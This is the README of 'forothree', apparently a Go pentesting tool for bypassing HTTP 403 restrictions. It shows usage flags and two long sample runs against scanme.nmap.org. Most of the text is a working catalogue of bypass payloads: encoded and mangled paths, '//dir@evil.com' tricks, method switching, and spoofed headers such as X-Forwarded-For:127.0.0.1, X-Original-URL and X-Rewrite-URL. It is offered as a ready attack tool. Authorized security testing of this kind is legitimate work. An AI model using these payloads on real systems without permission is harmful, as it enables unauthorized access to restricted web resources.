hanhanhanz / forothree

403 bypass tools based on golang
11 stars 5 forks source link
403-bypass bypass golang hacking pentesting web

Forothree

Tool for bypassing 403 pages with build-in alteration and adding headers. Payload mostly generated based on multiple 403 bypass i found in twitter. Created using Go with Fasthttp module. Feed it with multiple 403 URL and enjoy the show

Features

Requirement

Installation

$ go build forothree.go
$ ./forothree

Usage

$ ./forothree -h
Usage of /tmp/go-build145687935/b001/exe/forothree:
  -b     disable header bypass
  -c     disable recursive bypass
  -e string
         set custom headers, ex head1:myhead,head2:yourhead (default "Connection:close")
  -hl
         show header location
  -l     show response length
  -m string
         set request method (default "GET")
  -o string
         specify output file name
  -r int
         set max number of retries (default 2)
  -s string
        -s specify status code, ex 200,404 (default "200,404,403,301,404")
  -t int
         specify request timeout in seconds (default 3)
  -u string
         url target
  -ul string
         url list target

Example for single directory URL

$ ./forothree -u http://scanme.nmap.org/adminpage.php
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php//google.com            |code : 404 |length : 481 |
GET : http://scanme.nmap.org/%2e/adminpage.php                    |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php%2500                   |code : 404 |length : 473 |
POST : http://scanme.nmap.org/adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php%20                     |code : 404 |length : 471 |
GET : http://scanme.nmap.org/adminpage.php//dir@evil.com          |code : 404 |length : 483 |
GET : http://scanme.nmap.org/adminpage.php.json                   |code : 404 |length : 475 |
GET : http://scanme.nmap.org/./adminpage.php/./                   |code : 404 |length : 471 |
GET : http://scanme.nmap.org/adminpage.php/.                      |code : 404 |length : 471 |
GET : http://scanme.nmap.org/./adminpage.php                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php/~                      |code : 404 |length : 472 |
GET : http://scanme.nmap.org/adminpage.php%09                     |code : 404 |length : 471 |
GET : http://scanme.nmap.org//adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/..;/adminpage.php                    |code : 404 |length : 474 |
GET : http://scanme.nmap.org/adminpage.php/..;/                   |code : 404 |length : 475 |
GET : http://scanme.nmap.org/adminpage.php//                      |code : 404 |length : 471 |
GET : http://scanme.nmap.org/.;/adminpage.php                     |code : 404 |length : 473 |
GET : http://scanme.nmap.org/%97dminpage.php                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/.;adminpage.php                      |code : 404 |length : 472 |
GET : http://scanme.nmap.org/adminpage.php..;/                    |code : 404 |length : 474 |
GET : http://scanme.nmap.org./adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/\..\.\adminpage.php                  |code : 404 |length : 476 |
GET : http://scanme.nmap.org/Adminpage.php                        |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php?                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php#                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php??                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Originating-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : True-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-Host:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Content-Length:0 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Remote-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-Proto:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Fastly-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/                                     |code : 200 |length : 7779 |xtra-header : X-Rewrite-URL:/adminpage.php |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Custom-IP-Authorization:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Cluster-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-By:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Host:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-For:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : CF-Connecting-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Remote-Addr:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-For:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Real-IP:127.0.0.1 |
GET : http://scanme.nmap.org/QOjQ0G7FDC2Z7                        |code : 404 |length : 470 |xtra-header : X-Original-URL:/adminpage.php |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Connection:close |

Example for multiple directory URL

$ ./forothree -u http://scanme.nmap.org/dir1/dir2/adminpage.php
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php%09                     |code : 404 |length : 471 |
GET : http://scanme.nmap.org/adminpage.php//dir@evil.com          |code : 404 |length : 483 |
GET : http://scanme.nmap.org//adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/.;/adminpage.php                     |code : 404 |length : 473 |
GET : http://scanme.nmap.org/%97dminpage.php                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/./adminpage.php/./                   |code : 404 |length : 471 |
GET : http://scanme.nmap.org/adminpage.php//google.com            |code : 404 |length : 481 |
GET : http://scanme.nmap.org/adminpage.php??                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php//                      |code : 404 |length : 471 |
GET : http://scanme.nmap.org/adminpage.php/..;/                   |code : 404 |length : 475 |
GET : http://scanme.nmap.org/adminpage.php%20                     |code : 404 |length : 471 |
GET : http://scanme.nmap.org/.;adminpage.php                      |code : 404 |length : 472 |
GET : http://scanme.nmap.org./adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php/~                      |code : 404 |length : 472 |
GET : http://scanme.nmap.org/adminpage.php.json                   |code : 404 |length : 475 |
GET : http://scanme.nmap.org/adminpage.php/.                      |code : 404 |length : 471 |
GET : http://scanme.nmap.org/..;/adminpage.php                    |code : 404 |length : 474 |
POST : http://scanme.nmap.org/adminpage.php                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php#                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/adminpage.php%2500                   |code : 404 |length : 473 |
GET : http://scanme.nmap.org/adminpage.php..;/                    |code : 404 |length : 474 |
GET : http://scanme.nmap.org/adminpage.php?                       |code : 404 |length : 470 |
GET : http://scanme.nmap.org/./adminpage.php                      |code : 404 |length : 470 |
GET : http://scanme.nmap.org/Adminpage.php                        |code : 404 |length : 470 |
GET : http://scanme.nmap.org/%2e/adminpage.php                    |code : 404 |length : 470 |
GET : http://scanme.nmap.org/\..\.\adminpage.php                  |code : 404 |length : 476 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Originating-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Custom-IP-Authorization:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Real-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Remote-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Remote-Addr:127.0.0.1 |
GET : http://scanme.nmap.org/                                     |code : 200 |length : 7779 |xtra-header : X-Rewrite-URL:/adminpage.php |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : True-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-For:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : CF-Connecting-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-By:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Host:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-Proto:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Fastly-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-Host:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Content-Length:0 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Cluster-Client-IP:127.0.0.1 |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : X-Forwarded-For:127.0.0.1 |
GET : http://scanme.nmap.org/DI1lwxYJIJ1Ya                        |code : 404 |length : 470 |xtra-header : X-Original-URL:/adminpage.php |
GET : http://scanme.nmap.org/adminpage.php                        |code : 404 |length : 470 |xtra-header : Connection:close |